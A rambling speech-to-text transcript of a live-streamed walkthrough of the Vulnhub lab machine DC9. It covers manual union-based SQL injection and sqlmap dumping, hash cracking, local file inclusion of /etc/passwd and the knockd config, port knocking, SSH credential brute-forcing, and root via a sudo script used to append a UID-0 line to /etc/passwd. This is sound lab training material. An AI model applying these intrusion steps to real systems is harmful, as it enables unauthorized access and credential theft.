we do. I just imported this one. So I went through essentially TJ Null's list and just imported a bunch of machines. V Masscrafter, Bravery, DC9, Mercy, or Development. Let's see. Mercy, DC9. Waiting on a few more. We can do DC9. So let's start this one up and figure what this is. So looks like that is started. And if you haven't done it before, how I generally do Vulnhub is I put everything on the host only adapter, and on my actual Kali VM, I give it an adapter as well that is on host only. So ETH1 is going to be on the same network as Vulnhub. So let's go full screen and go into inclusive mode. So make dir, this is DC9. So let's go into this and open up tmux. And hold on 1 second. I have a stream on the other monitor which was distracting me. So pause that. Let's make the directory nmap, and before we nmap it, we have to figure out what its IP address is. So I'm just going to do arp scan interface eth1, and actually didn't go in tmux. Tmuxn, or tmux. There we go. If config eth1, my subnet's 192.168.48. So we can do arp scan -- interface 192.168.48.0/24. If we specify the interface, eth1. And we have two machines. Or actually one. This is broadcast. So chances are DC9 is going to be at 130. So we can begin the nmap with -sc-sv-oa, nmap DC9, and then put the IP address. And let that go. We can then do sleep 300. Give it about 5 minutes till we do the next nmap. nmap-p-, and mute my phone. The IP address, and we should also do OA to output all formats, nmap, and DC9-all ports. So we already have it back. We do have 22 in that saying filtered. This is a little bit odd because no other ports are filtered. So we know this box is doing something differently on port 22. Chances are that different thing is going to be IP tables. We see this box is Debian. It is HTTPD, and we don't really have that much other information. Potential hostname leak of example.com, but I don't think that's going to be the hostname of this box. So what we're going to do is just go 192.168, what's the IP? 48.130. We're going to see what this box is. That is displaying weird how it has details. But we get a web page, and I'm also going to open up Burp Suite. So let's just do Burp Suite. So we have this running. Come on. I guess while that opens up, we can take a look at this. So there's a page, display, search, and manage. Delete that. Next. Sure. Okay. So we take a look at all the options we have. This display.php is giving us, looks like, a lot of information about people. And if we want to start brute forcing a way in, well, we may want to take a note of all these users. So I'm going to do a new tab, curl this, and let's see if we can get to where the username is. Let's see. grep id And then let's go and pipe this over to a text file and go edit it. And let's grab all the users. So I'm just going to do a new line every time this little closed caret is. And then we'll save this file, cat users, and we can grep for email, probably grep-a because it's same binary format. And we can do awk, print 2, and another awk-f to do a field separator. We want to separate at the @ sign, and we'll do print 1. So now we got a list of users, and we'll just move that there. There's probably more elegant ways to do that. That's just easiest way to do it off the top of my head. So that's what we got from this. Let's go to the next page. We have a search box. It says you can search either using the first or last name. So let's go search and search for Tom. If we do Tom, we get this. So we could try to go over to Burp Suite and try some basic SQL injection. So make sure this is on intercept mode. Submit, repeater, and send this. I'm going to take a note at the bytes on this bottom, so 1,347 bytes. So if something else changes in this page, I'll know. And let's just see if we can make this page get an error message. So I put a single quote in, we get 0 results, and don't get anything. If we just search for something like T, let's see what happens. 0 results as well. So let's go back to Tom. And let's put a comment after the single quote. Let's see what happens. We get Tom again. So at this point, I'm getting pretty confident this is going to be SQL injection because of just how that behaved. So let's see. We can do Tom and then order by 1. Let's go and URL encode this. And right now I'm just trying to find out how many fields come back. I'm guessing there's going to be, let's see, 1, 2, 3, 4, 5 fields come back. So order by 1, we get 1,347 bytes. So we're just going to keep doing this until it's no longer 1,300. 2, 3, 4, 5, 6. At 7, we go to 1,248 bytes. So there's going to be 6 fields coming back. So at this point, we can now switch over to a union injection and start taking stuff out of the database. So if we do get rid of this order by and do union select 1, 2, 3, 4, 5, 6. Oh, I don't know if we have to URL encode this. Let's see. We do not. We get this second field, ID 1, name 2, 3, position 4, 5, 6. So if we put anything here, since ID is here, we can just put please subscribe. And then please subscribe is going to come back on the page. If you want to see how this looks in the actual Firefox, we can put this over into the proxy and click forward here. And original request comes back and we have ID please subscribe. So we have to now probably extract stuff out of the database. And at this point, I'm going to look at the chat and see if people want to do SQLmap or do this piece manually, because we've done both plenty of times in previous videos. So tell me what you want. We'll try to make this a little bit interactive. And I guess while that goes, I'm going to go take a look at the login prompt. Actually, overwhelming demand, it's saying manual. So let's go and do this manually. If you're not familiar, SQL stuff gets stored in a table called information schema. And this box doesn't have an IP address. So I'm just going to connect to this. This box is from Vulnhub. So yeah. Google, come on. Okay, so now we have internet. So if we can do information schema columns, go to the MySQL document, and let's see. Oh, tables. This is what I want. So the schemata table is going to be the first one. So the schemata table is laid out as schema name is the database name. So let's go do that. Go back to repeater, and here we can do select schema name from information schema dot schemata and see if this comes back. It does not. Let's put this in like this. I'm having a brain fart for this. Just Google union injection information schema. It's tough reading chat and doing this at the same time. Union select table name, table schema. It's like this way. Schema name. Get these quotes out of it. We have a SQL error. Select. Zero results. Oh my. Union all, select user password from MySQL. Select schema name from information schema.schemata. That should work. Oh, we probably have to limit. Limit 1. Limit 2. 1, 1. Maybe we just can't get this information out. We can do DB version, I believe. Okay. I think we have to do union select schema name, all this from information schema dot schemata. Try this way. Comes back, and there we go. So that was it. I just placed this in the wrong thing. I was trying to do a nested SQL query. But we can limit 1, comma 1, and we get, let's see, information schema. If we do the second one, we'll get, let's see, ID staff. So there is a database called staff. So let's go back and look at the column. Come on. Why does my interface keep dropping? There we go. So let's go back to the schemata table, and this time we can look at the tables. Information schema. Come on. Table. And we can grab table name. And table schema is going to be staff. So going back into a query, we do union select, and we can change this to be table name, and change this to be staff. Or no, information schema dot tables. And we'll probably want to do where information schema dot not where, we'll just do this and see what happens. So applicable roles, this is going to be going out of the schemata table. So now we have to put a limit to actually grab this out of staff. So change this to be where information schema dot, or what is it? Where table schema is equal to staff. Nothing. I am failing all over. Let's just go up 30. ID tables, let's go to 40. Index statistics, we can probably do group concat table name and get rid of the limit. See what this does, and this is going to dump everything. So all I did was take away the limit, and I do group concat, and it will dump everything. So we're going to grab information out of probably users. So we can change this SQL injection to be users and change this to be staff.users. Let's go back. I should save this. Let's open a new query. Label this one to be db dump, and label the next one. Let's see. Staff details, users, user detail. So since we're already in the staff table, we probably don't need to put any declaration on where we're going, and we can just do users. Nothing, and we're not grabbing the right thing. Table name. Let's see. Let's get columns. So we can do thank you, David Maynor, for a donation. Let's see. Let's go back and search for columns. And we can do table name, column name. So let's do group concat. We should be able to put them both on the same table name, column name from information schema dot columns. And then that's a lot of output. But we get, let's see, just copy all this, or we can put colon. Is that going to go? Nope. Let's do comma like that. And then copy this to a text file and play with it. V output paste %s, and we can go on comma, new line, and we have the table, staff details, ID, first name, last name, position, phone, email, registration date. We have users with user ID, username, passwords, and ID. User details with ID, first name, last name, username, and password. So we probably want to do the username and password. So let's go back in here and we can do username and password. From, it's going to be staff.user details. And we get nothing. Can we just do username, password? No. From staff. Let's go back to this and just dump all of the schemas. So we can do from information schema dot schemata and schema name. Was that it? So staff and users. So this will be from users dot user details probably. Users dot user details. And we finally have now a dump of the SQL. So let's grab all this. And we'll rename output to be table dump. And we'll create a new file called creds, paste it in, comma, do this. I guess I didn't need this /r or something, but we get a bunch of username and passwords. So let's go and try, well, we don't have crackmap exec actually, because 22 was filtered. So if we go back to our nmap, less dc9.nmap, we only have 80 open. If we look at dc9, all ports, and we see nothing else. So we got to keep looking at this page. We could also try to drop a file. So if we do this union select, we can try select test, send all that, and do into out file var www html test.php, and we'll just try this real quick. Go back here, test.php, not found, so probably not there. So at this point, let's go and go to manage and test a few logins. So cat creds, and let's go and do all these. So Mary M, paste, invalid. We can try admin, and what I'm going to do is do or 1 equals 1 and a comment to see if this SQL injection works here. Maybe both fields are injectable. So let's just try that. Did not work. Try it in the username and still doesn't work. So let's go to Julie D and try this one. Doesn't work. Fred F. Doesn't work. Bernie R. Tom C. Probably should go over to Hydra eventually or something and script this out, but by the time I looked up all that syntax, I could have just done it manually. Jerry M. Wilmaf. These credentials came from the database. Betty R. Chandler B. You know, this is Vulnhub. I bet it's going to be like the very last one on the list. So when doing Vulnhub, always do like the first two and then do the bottom because people tend to do that. Doesn't work. Let's try this one. And log in. Did not work. At this point, we could probably do something better. Let's just script this out because there's user error, probably. So, actually, we can probably use Burp Suite. So, cat creds awk-f this print 1 users and do 2 passwords, and let's go over to, let's see, we'll use a paid feature here. So you can see how these work. Burp Suite, intercept, turn intercept on. This will probably be in a video when this is done. So here, let's see. I always forget what these are. I wish I had descriptions next to attack type. I think I want the attack type of battering ram. There's one that would take input from 2 files and go through both those files, putting these credentials in. So label these fields. And payloads, we can do load, root, Vulnhub, DC9, users. And let's see, is there a second payload? Should be a way to do second. Let's try cluster bomb. There we go. So because we have 2 here, and we have payload set 1 and 2 here, we can do it this way. So there we go. So we start attack, and we can see, oh, cluster bomb's going to try every password for every user. I guess it still works. Let's take a look at this login request. And don't think we have any. So maybe this login page is a false flag. The one thing we could do to make sure, get rid of a cookie beforehand just in case there's a weird lockout, and start the attack again. And everything still is 200 at 1608. Check options. Let's see. Since this is login, we can try the redirect. Let's change that here. Start attack. Lengths. So nothing. What we didn't do that I always do is run a GoBuster, so we should have something going on in the background. So -w for word list, user share word list, then we can do dirbuster, then let's see, directory list 2.3 small -x php, and then -u http 10.10.10 not 10.10.10. That would be if we were doing hack the box. And we have to put it in dir mode. And we should do an out file. We'll do gobuster-root. Let that run, and we get a bunch of scripts. So let's see. Index, search, welcome, results, display. We haven't seen welcome. So let's go over to welcome. We gotta turn Burp Suite intercept off. And check what this is. And I'm already logged in. So we get an error message, file doesn't exist. So we can try fuzzing random parameters. Name equals, let's try index.php, nothing. File name, nothing. File, nothing. Let's send this over to wfuzz. So ls user share seclist, and we can do probably discovery and look at something with variables. Variables, secret keywords. We can try this real quick. wfuzz-u, paste this in, and before I do this, I'm going to clear all cookies because I want to make sure this happens when I have no PHP session. So let's go over to storage and delete this. And wait, what? So if I delete this, hit welcome, delete all, let's go here. Okay, I thought it redirected me to a login prompt before. Let's just try curling this. That was bizarre. Yeah, that's redirecting me to a login prompt. Oh, welcome.php. They probably didn't put the die at the script. So let's see. I don't know. I honestly don't know what's happening right here. Change this to a get. Send. Helps if I don't make a typo. You can just turn intercept on. Send to repeater. Thank you for the donation, Casey. So let's take this PHP session out. And we get a login request. So it looks like as long as we have a PHP session ID, it just logs us in. So that is unique, but I guess works in our favor. So let's open up Cherry Tree real quick. And I want to take a note of this, because once we get on the box and root this thing, I want to take a look at exactly why this happens. So let's go to DC9 and call this follow-up. And welcome.php logs in with PHP session. So now we have that note. When we do wfuzz, it's going to be important that we have a valid cookie. So let's grab this. Go back here and do wfuzz-h. And let's see, where is cookie? -b. So we can do probably wfuzz-b and do probably php sessid is equal to this. Did not paste. There we go. And then let's see. -u for URL, HTTP, 10.10.10. That's going to be a hard habit to break. 192.168.48.130. Welcome.php. We'll see how long this box actually takes. I was hoping to do 2 or 3. I may only do 2. I was expecting to have user by now, honestly. Let's see. Fuzz is equal to, we'll say index.php. And we need a payload. And this was secret keywords.text. So w secret keywords.text. And let's see. We're getting a 302 redirect, so it didn't like how we did our cookie. So is it PHP session ID? PHP SESSID? PHP SESSID? Maybe it wants it in colon. 302 redirect still. We can probably specify proxy. So if we do wfuzz-h, let's send it over to a proxy. grep-i proxy-p. So -p 127.0.0.1 and type, let's say HTTP. And go over to proxy. Clear that. Capital HTTP. And let's see. So the cookie, it definitely is not going to be colon. So we can Control-C out of this. And we want, let's see, go back to repeater. It's going to be equals. So let's go back here. Go back to proxy. And we have PHP sessid is equal to like that. And here's where we're fuzzing. This is coming out of that word list. If we send this, we're getting a 302 found. So it doesn't like something here. Maybe it's going to be the user agent. So let's go and take a look at this. If we refresh the page, intercept is off. We're already logged in. So let's turn intercept on, send this in, and see what is different between these two requests. Because this one gets 302 found. This one gets 200 OK. So the host, that is fine. Oh, this is going to manage. Wait. So it redirected me and then went to manage.php, which says file doesn't exist. Okay. I missed that redirect. So if we do manage.php, we get this. And let's see if we can make it actually find a file. So change this to be manage. And we can turn proxy off. And we want to hide probably, let's say, 100 words. So we can do --HW 100 and nothing there. Let's see. Web content. Let's do raft small words. What's this look like? Try this. Secret keywords. Raft small words. .txt. And I'm going to take the proxy off because that is definitely slowing the request down. So let's turn the proxy off. And we're going through this. And while that goes, let's play with it ourselves. So what I'm going to do, search file does not exist. So this way I can easily find out if it does. And we'll try file name, index.php. We have one match, so we know that didn't work. Maybe it's appending PHP to things. That's something that happens. Did not work. We can try file, index.php. Still the same thing. Still the same thing. Let's try Etsy passwd. Does exist. File name doesn't exist. We could potentially go back to the oh, we're getting a few. Oh, that was me hitting something. But we could go back to the SQL injection at this point and try to read a file. So if we do SQL injection cheat sheet, go to pentest. I don't know why that keeps happening. Something is wrong with my DH client. Take a look at this. Let's see. File, command execution, select stir from into dump file, load file. So union all, select load file. So let's go back here and we can do select load file, Etsy passwd, and see if we can load this. Get rid of this into out file. Let's see. ID, nothing there. Nothing there. Let's see. We can do MySQL base64 read file. There's a from base64. Is there two? There is two base64. So let's try to base64 load file. That. And it doesn't look like we'll be able to do this. So I don't think we can steal the source code. Let's go back to wfuzz and specify a different one. So someone in the chat was saying, try like burp dash parameters, I think. So we can do discovery, web content, burp parameter names. Try this. Stefan, we tried the in to out file before, and it didn't work. On those SQL injections, I was missing a... The quote is right here. So if we take this union off, it works. So ID 1234. So the quote wasn't missing there. If we change this to please subscribe, it works. So we just don't have permission to do load file. So let's take a look at the source code of the page. Maybe they have a hint here. Doesn't look like it. So let's see. We could try changing it to a post request and seeing if that does anything. File doesn't exist. So let's go back to wfuzz and grep-i post. So let's see. -d. And I'm going to do that proxy again just to make sure I have this correct. So 127.0.0.1.80.80 HTTP. Go over to Burp Suite, send this here, and I definitely do not have it correct. So let's put a equals here. And drop this request. We got to drop a few. There we go. So now we have it going through post. And let's see, before it was 100 words, and now it's 106. So what happens on a post request to manage that is different? Your login name or password is invalid. Already logged in as admin. File does not exist. So let's just change this to 106 instead of 100. See if this comes back. Nothing did. So let's see. We can try using, I guess, SQLmap with that SQL injection and see if it can read a file. So let's go back to search, test, intercept this. Because I think we have to get the source code to that manage thing to figure out how it's getting us files. So let's do copy the file, search.request. And we can go back to a directory, SQLmap -r, search.request. We can do --batch. Technique equals u. We know this is union. We could also do dbms MySQL. And let's see. Search might not be injectable. No, it definitely is. Less search.request. Let's just do -p search. And we can see what else is here. It's only doing time-based blind, which is going, oh no, there we go, union. So we can do --dump and get everything. Let's see, what did it just take? So this is the staff table I believe we had already got. And I guess now it's trying to crack passwords. Nothing was hashed. Staff details. Oh, we probably only grabbed one thing. Repeater. Group concat. Let's do probably username, password from staff details. Let's see, we got an MD5 hash here. Let's go to hashes.org. While that loads, username and password's not in staff details. This is staff users. So search this hash, CV7HKGP. The results. I'm not sure why the site's not really returning anything. Go over to the Kraken, and we will do echo-n, wc-c, most likely going to be MD5 sum at 32 characters, cd hashcat, the hash is MD5. I think this mode is 100 off the top of my head. So we can do hashcat, example hashes less 100. Nope, that's SHA-1. 0 is MD5. So hashcat-m 0 hashes MD5 opt word list rockU. And we'll see if this cracks it. We can do rules inside pro passwords pro. See if this cracks it. someone said hash killer return this hash. So we can go hash killer and search this. The Kraken is a physical machine. So let's see, MD5 pass. Wasn't one. Couldn't you used to just search this? And not do a file? SWSCMEP. And we got a password of transer_biddle1. So there we go. So if we do temp, put this in, and just make sure a hashcat would have worked if we had that in our password list. Let's double check. Loading. And yes, it did crack. So we got transorbital1 as the password. I'm going to go back into Burp Suite and try this password with every user. So going back to the Intruder tab, positions, payloads 2, clear, put this in, and we can just start the attack and see if this works. And does not, but let's take note of this password. So users, passwords, and we'll put the password there. So we're still back at trying to figure out what this error message is, or if that's just there to troll us. There is this add record, and add record is just going to manage. It's getting redirected. I'm guessing something screwed up with this login right now. Let's see. Did I take a snapshot of this machine? Snapshot. Let's revert. Because I couldn't log out and that was getting annoying. So just revert the machine. Always comes in handy to have reverts ready. So let's see, is this back up? Power on. Okay. So now our cookies are cleared and the box is, well, cookies not cleared. We can clear cookies as well. But box has been reverted. Clear data. There we go. So let's try going to that welcome.php thing again. And that behavior still exists. And add record is not working. So it's only on manage.php it shows that. Let's see. Let's go back to wfuzz. And let's see. Wasn't this tab? Was it this tab? I'm not sure what tab I had wfuzz running in. So let's just do it again. Oh, here it is. This one. So let's do the old true bunch of dot dot slashes. And we're going to have to change this to 93 words. So I'm guessing this parameter is being reflected back in there because the words keep changing based upon what I'm putting in for this. Do this. And let's hide 87. And let's do content. Where's variables? There we go. And this was secret keywords. .text. And try the user admin. So we can load this, load passwords, and we can go to 1. Try adding the user admin to our user list. We don't need that blank. Start the attack again and see if we should try to admin. And admin transorbital 1. So now we can log in. And once we figure out how to get to the login prompt, we can log in, I should say. So let's delete this cookie. Refresh manage. There we go. Admin transorbital 1. And now we are logged in. If we go to add a record, we can add a username into this. So test 1 555 555 5555 a@b.com. And we get a new record created. If we display, we have that. So let's go back to manage, and we can try file index.php. File doesn't exist. Var www HTML. File doesn't exist. Let's put a bunch of slashes. And the web server is not coming back. So I think we found it. We just included the script that it's including. So I'm not sure why index.php doesn't come back with anything. But I wonder if we do /index.php. Okay, so we're in a directory somewhere. So it's probably like a directory called a lib or library that has whatever script we're in. So let's try going a few more up and do etc passwd to verify this. There we go. So we get all the users there. So we can try PHP filter convert dot, is it convert dot or convert dash? I think dot base 64. Let's just Google that. PHP filter convert base64. Every time I Google, I need to update this. I should just reboot this box. Does Burp Suite not have internet? Okay, weird. Convert .base64-encode. So I was on the right track. Convert .base64-encode. Resource is equal to this, and we'll see if this works. Probably have to URL encode this or something. Let's now send this to Burp. Proxy, intercept, send. Let's see. Let's just clean up the referral. That's messy. Wait. I sent the wrong thing. Intercept off. We wanted manage. File is equal to this. Oh, I have 2 colons. Let's Control U to URL encode. And we're still just getting this. php://filter/convert.base64-encode. Resource is equal to. I'm actually not sure why it's just returning etc past WD. That is odd behavior. That is just like magically saying, hey, let's get rid of this PHP filter. Margaret Smith, we did that. So now we have LFI. Let's try getting a shell from this. So let's test var log apache2 access.log to see if we can read this file. We can't. We can check if we can go into the proc system. So if we do proc self, this is going to be our self. So if we do cd/proc, this is just a bunch of information where all the process information lives. And I just explained that badly. But if I do ps-ef grep bash, let's go into 1174. This process actually has a directory here, and then it has a bunch of information about that process. So there's probably a CMD line, and that is bash. So that's what this directory is. But the thing I wanted to go in is proc self fd for file descriptor. And sometimes you get lucky and find a file descriptor where you can actually have like the user agent in this, and then put PHP code in that and get code execution that way. So proc self fd0 return file does not exist. So let's try CMD line. And let's see. Didn't say file does not exist. I'm guessing Apache 2 is here. Oh, let's put a space there. There we go. So that's the command line for this process. So let's try going back to wfuzz with this. So fd. And we can exit this to open a new tab. wfuzz -z. So what I'm going to do is -z range. So let's see. Is it somewhere here? Range. I'm not sure where it's in the syntax, but -z range, comma, 0 to 100. And we can do HTTP 192.168.48.130 / file is equal to bunch of dot slashes proc self fd fuzz. And now we're trying to find if any of these are not 10 length or don't return, well, manage.php question mark. There we go. Everything is the same. What are bots? Which ones? I don't know what happened in the chat. Okay, well, let's see. We don't have FD. Let's try something else. So we tried the var. We tried FD. We tried going into db dump and doing something into an out file. So if we do into out file var www html test.php, this doesn't work. So we can't just now go to the server and hit test.php. Uh, 192 test.php doesn't exist. We could try proc self environment, or environ. See what this is. It doesn't exist. Proc self. Did I get that correct? Yes, I did. So that would normally contain like your variables for your environment, or environmental variables. So let's see. There is net and let's see, TCP. So if we do proc net TCP, let's see. I think this is the, no, I think CEA is the port maybe. And this is, let's see, hex 0x16 to decimal. Are you kidding me? Uh, 16 in hex is 22 because 16 plus 6. So let's see. Do I know anyone in the chat that would want to get rid of bots? I keep seeing you guys complain about spam. I don't see anyone I recognize. So let's just move on. Where was I? So there's probably 2 ports. CEA is probably 80 and 16 is 22. So let's go and look back in proc at files, things we have. Another good file to include on LFIs is probably sched debug, if this is here, scheduler debug. It contains a bunch of useful information like what processes are running on the box. So let's just include this and take a look at it. So let's see. Right here is we're going to get into what is running. Systemd, bunch of SCSI stuff. Kworker, swap, DH client, cron. Oh god. I clicked and then went somewhere. Okay. Let's go back to where we were. We can do copy these to a file and then just unique these because there's a lot of repeats. To sort-u less and going through these again. Apache, cron, DH client, Kworker, MySQL. Nothing important there. Let's see, runnable tasks. Let's do this one. Copy. And we see knockd. So knockd is a port knocking thing. And its config is normally, I think, in etc knockd.conf. So it goes back to the nmap we ran a long time ago and saying the port 22 is filtered. So I'm guessing that this knockd file will say what ports to hit, and then we can open up SSH. So etc knockd.conf. Go back to repeater actually. etc knockd.conf. And here we go. So IP tables change to accept if we hit these ports within 25 seconds. So let's just do this. And someone's saying, ban that person. There we go. I'm just reading the chat right now and trying to find if there's anyone I really know. Blitz, I added you as a mod. And I guess I'll add Asgar. This slows down. There we go. hopefully that helps it. So where was I? Oh, knock D. So NC 192.168 48.130, and then 7469. The next port will be 8475. Then the next port 9842. So now let's try nmap-p 22 on the IP and see if it's open. Probably have to do -n to not do DNS, and we see SSH is open. So we can SSH to this, and we'll have to probably go through Hydra because we got a lot of users and passwords. So does crackmap exec actually do SSH? I don't think it does. Let's see. No, but Hydra probably will. So Hydra-H. Let's do -L, users, -P, passwords, and then SSH 192.168.48.130. And we're going to try this. I'm going to add -v for verbose. This video will probably be uploaded, I'm guessing. I don't know. I'm not recording it, so it depends on YouTube. We're getting SSH errors. Can't connect. (192.168.48.130). Cannot connect to target port 22. Try Medusa. Try ncrack, because that's what's on my box right now. -U, users, P, passwords, SSH 192.168.48.130. So we could also try straight away that admin user that had worked. So it was admin and then something orbital. So admin and transorbital 1. Oh, discovered credentials. Chandler P, you're a god. Joey and password. So now we're getting a few. So SSH to this, 192.168.48.130. Paste it. CHANDLERB. There we go. Now we're on the box. So there's going to be a few users on this box, which is probably going to be a bit of a pain. I'm going to avoid using any kernel exploits because this box is pretty old, and I don't know if that's intended. So right now I'm just going to try each user and see if they can sudo. And then we will do some linenum stuff. So Joey can't. and try this one. So no one can run sudo. So let's make the directory www and copy Linpeas over. So cp opt. I guess I'll do linenum first. Copy it here. And we want privilege escalation, awesome script suite. And we'll try Linpeas. And then just do Python 3, start up a web server. And I'm getting a phone call real quick, so I'm going to mute the microphone real quick. Okay, so let's see, where were we? Oh, we're doing linenum. So let's do curl 192.168.48. I want to say I'm 129. We'll try this first. Linpeas.sh. Of course we don't have curl. Do we have wget? We do. So we can run this and see what we see. Testing my sound real quick, just because I had it muted, to make sure that's still working. Sound is good. Okay. So let's go through this. So just looking for pretty much red stuff. So we got that knockd, root, cron jobs, Chandler, Fred, logins, let's see. Nothing really here. This stuff is a bit unique. Backup file. See what this is. I'm guessing this is related to MySQL just because it has Maria in it, but I honestly don't know. And a switch. So there's a few things we can check. Seeing the www directory, and we got a backup file. So let's look at what back manage PHP is. Let's see. My password 1. So this is the login stuff. Here we're doing the real escape string. I don't know where it's... And password is equal to... Oh. Okay, so it's just taking your password, doing an MD5 on it, then searching the database. Let's see. Let's look in config. This is where credentials normally are. Let's see. Connection. Password is password. Okay. Is there like a backup config? Let's do ls grep for back. Manage search welcome. Nothing there. So let's see. Do we get anything else? This is where we ran ncrack, Chandler, Joey, and Janitor. So let's see. I'm going to go back here real quick, and we're just going to check these credentials with the stuff we had dumped earlier. And I want to see if this database was correct. So we got Chandler was you're a god, Joey was password, and Janitor was that password. So let's go back on this box. Last pass WD. We can just grep bash for this pass WD, and we can try other accounts. So let's try Janitor 2. Do we have Janitor 2 credentials? Hawaii 50. So we can copy this, su dash Janitor 2. Can we log in with him? We can't. Let's try another one. Scoots. Su dash. Scoots. Nothing. So I can trust that ncrack output. So let's see. Go back to that one file. Let's take a look at what this is. And I don't know what file this is. So let's try running linenum now. So we can just go back to our home directory and then run linenum, and then I'll probably switch over to another user and try that. So 48.130 linenum.sh, not a found. Let's see. $8,000. Oh, 129 is my IP. There we go. Run linenum. I'm going to enable debug checks, or thorough checks. So it's got a thorough option, -T. So I'm going to run this. And let's see what there is. So this is just us being logged in. Host name. Nothing there. Home directory permissions. Looks like home directory permissions are just fine. All the users can read, write, execute. No groups, no everyone. So we should probably check the other users' home directories by switching to them. Bunch of systemd stuff. I believe we tried SUing with that orbital password. We can try again. So let's go cat passwords, and do this one. Angry Bigfoot, I would do GTFO bin. However, the SUID binaries didn't really have any. So if we execute Linpeas, this is better for looking at set UID stuff. I think we could also just do find -perm like 4000. I think it is for searching for that. Set UID. Set UID. If config. Set UIDs are somewhere in here. But when I was going through this earlier, right here, this is where we'd use GTFO bins, and going through this, none of these look like they're exploitable to me. So let's see. Let's do MySQL-u or cd vir www HTML grep-i pass. Look for passwords here. Doesn't really look like anything. Let's cat config and do MySQL-u db user -p. Log in with password, and we can do show tables, show databases. And what I'm going to do is try to find other passwords that we may have missed. So use staff, show tables, select star from users. This is that admin password. Select star from staff details. And we're not getting any passwords. Let's see. I'm just looking at the registration dates to see if there's any hints here. We had janitor's account. Thank you, Blade Man, for the donation. But, so what I was saying, we have this account, and the registration date's different. So I'm going to switch over to janitor and run Linpeas after we look at the users table. So let's do use users. We don't have access to that, so let's look at let's add records. And let's see, MySQL. How is it adding the record? Let's see. Session. Include config. It's doing the same thing. grep db name stir. Grep users stir. Logged in name. Let's just try that. Log in again. Show databases. Use users. Oh, I probably did use user and got access denied. Okay. That makes sense then. Show tables. Select stir from user details. Bunch of stuff. So let's go and switch to the janitor user. So su janitor and his password. As a reminder, we're doing janitor just because of the registration date for him was slightly different. So searching through his home directory, we do have a hidden directory and passwords he found on Post-it notes. So let's grab this. Is this where encrack was? It was. The passwords. Add these passwords. And do this. And this could take a while. So let's see. sucrack. Let's see. This would be a little bit quicker if this works. So save this. Do we have GCC on the box? Locate. Do I do Jeopardy CTFs? Sometimes. I don't do CTFs all that much, honestly. Outside of Hack the Box now. Let's see. We could probably compile it on Kali and then run it here because it is Debian. So let's move it from downloads and sucrack. Make dir sucrack mv. Enter zxvf. Let's see. Configure. Make. Oh, we got an error message. Let's see. /configure. Yeah. What is the error? Undefined reference. Do we have sucrack in the repo? We do. So instead of trying to compile it, let's just install it and then copy it on over. So we can do which sucrack cp user bin sucrack to root vulnhub dc9 dub. And we got a new account, fredf. But let's try sucrack real quick. 192, 168, 48, 130. Nope, 129, 8000 sucrack. Download it. Let's see if this executes. I did a dash, not a plus. It does. So let's try using this program because it's been a long time since I've used this. So sucrack, just wordlist.txt. Okay. So let's copy passwords to dub and do a wget on passwords and sucrack passwords and see if this actually gives us a bunch of usernames. So file size, let's see. Progress 27.2%, 36%. It's still relatively slow. Let's see. Cracking local user accounts via su -s. That's for printing statistics. Dash B, maybe be threads. We're at 73%. So what sucrack does, it takes a list of all the users and tries their passwords against it. So what prefix do I use for tmux? I just use the default right now, which is Control B. And did not look like it worked. Which we definitely should have got a few counts with this. But I'm not sure why it didn't work. But we can try Fred F with this password, and somewhere on my computer I have Outlook running. Let's see. Let's close that window. I think I closed Outlook. So switch to this user and see what we have. su-Fred F. And we can log in as him. Find.-type F. No files here. Let's do wget 192.168.48.129, 8,000, and we'll do Linpeas.sh. Maybe it's just all lowercase. There it is. Execute this, and we'll see what we have. See. Groups. He's not a member of any new groups. Writable folder, dev shm. Nothing interesting. Instead of doing that, we can just test sudo, and we can run sudo with something. So fredf may run the following command as root. We should have definitely gone through this directory as other users. What's in scripts? Access denied? Okay, only root can. Go into dev stuff, and he can execute this. So dist test, and this will be an elf. So this executes a file. So Python test read append. Let's look at test.py. Find.-writable. I don't think there's an E. So we can't write to any of these files. They're owned by root. So if I could have wrote a file somewhere here, I could probably get it executed by this Python script. But if we can read a file and write a file, well, oh, append. So that's even better. So let's do touch temp test and sudo-l. Let's do sudo this file temp test t and cat this file. This is a test. Let's see. Sudo this. Usage. Read append. Let's look back at test.py. So let's see, argv1, it's going to open that file as output and append it. So let's copy test.py into our home directory. Temp test A. Put please subscribe here. Maybe it needs content. Can't run. Please subscribe. So we're doing something wrong with this. But now that we copied test.py to our directory, we can just print things. So print sys argv1. Yes. And oh, it's two file open commands. So we need two files. That's why. So let's do cd temp v file1, please subscribe, v file2. This is a test. So file1, temp file2. If we cat temp file2, we have please subscribe in it. So now we can write a file on this box. So we could try doing a SSH key and root. So let's try that real quick. Let's do ssh-keygen -f. We'll just call this root. Cat root.pub. Copy this. And let's do v temp key. So we'll do that sudo again. And we can do temp key into root ssh authorize keys. And there's no such directory. So let's see. We could probably just write to passwd. Let's do OpenSSL passwd Linux. Let's see. Try this. Password will be please subscribe, and salt will be thanks for watching. Truncating password to 8 characters. Let's just do password. So cat etsy passwd tail-1. We can do it on here. And temp test. IPsec. Put this here, and this may work. We'll see if it does. Just do that, and we'll put us in root. So what I'm doing is mainly creating a line in Etsy passwd, username, password, user ID number, 0 is root, group ID number, 0 is root, name, I just did that, home directory, and shell. So let's do back to the sudo, and we called this temp/test, and Etsy passwd. We cat Etsy passwd. I am there now. su-ipsec. And password, and we are now root. So that is that box. So what I wanted to do is we went back here. There was this welcome.php logged in with session. Let's take a look at this code real quick. So var www html v welcome.php. Let's just do DOS to Unix, or, oh well, then welcome. So let's see. So we're including session.php, and session.php, session start, if session, my username, die. grep-r. Let's see. So my assumption is right now, this is actually being set so the script isn't dying when you're logged out. So as a refresher, if you weren't here for the start of the stream, we had a lot of weird issues with this manage thing. So if I clicked manage, let's delete my session. Let's go to welcome.php, and we're logged in as admin, and click manage, and we're logged in. So we should look at what welcome.php is doing, because that is where it's logging us in. So less welcome.php, if session logged in, we want to look at session my username. Well, welcome.php has that session included as well. vconfig. And I'll probably do one more box after this. So I'm just going to look at this for not too much longer, and then we'll do another box. grep-i sess. Let's see, var-lib php sessions. So this is going to be where the PHP cookies are stored. So we can see where that session variable is equal to. So if we delete this, refresh on manage, a session is here. So a session's blank right now. So let's refresh the page, and a session is still blank. So if we click on search, display all records, everything's blank. And let's do this through Burp Suite so we don't automatically follow the redirect. So if we go to welcome.php, turn intercept on, we're still in that same session. So I'm going to intercept the response to this request. Click forward. This is just a 302 found. And if we go back here, it magically logged us in. So we can see logged in username, admin. I'm not sure why that did that. So is it getting here somehow? If session status... I'm honestly not sure why welcome.php is setting that. Does anyone in the chat have an idea? If not, we'll just switch to the next machine. So we got server name localhost. This is just the DB stuff. Oh, wait. welcome, yeah. So if we go into 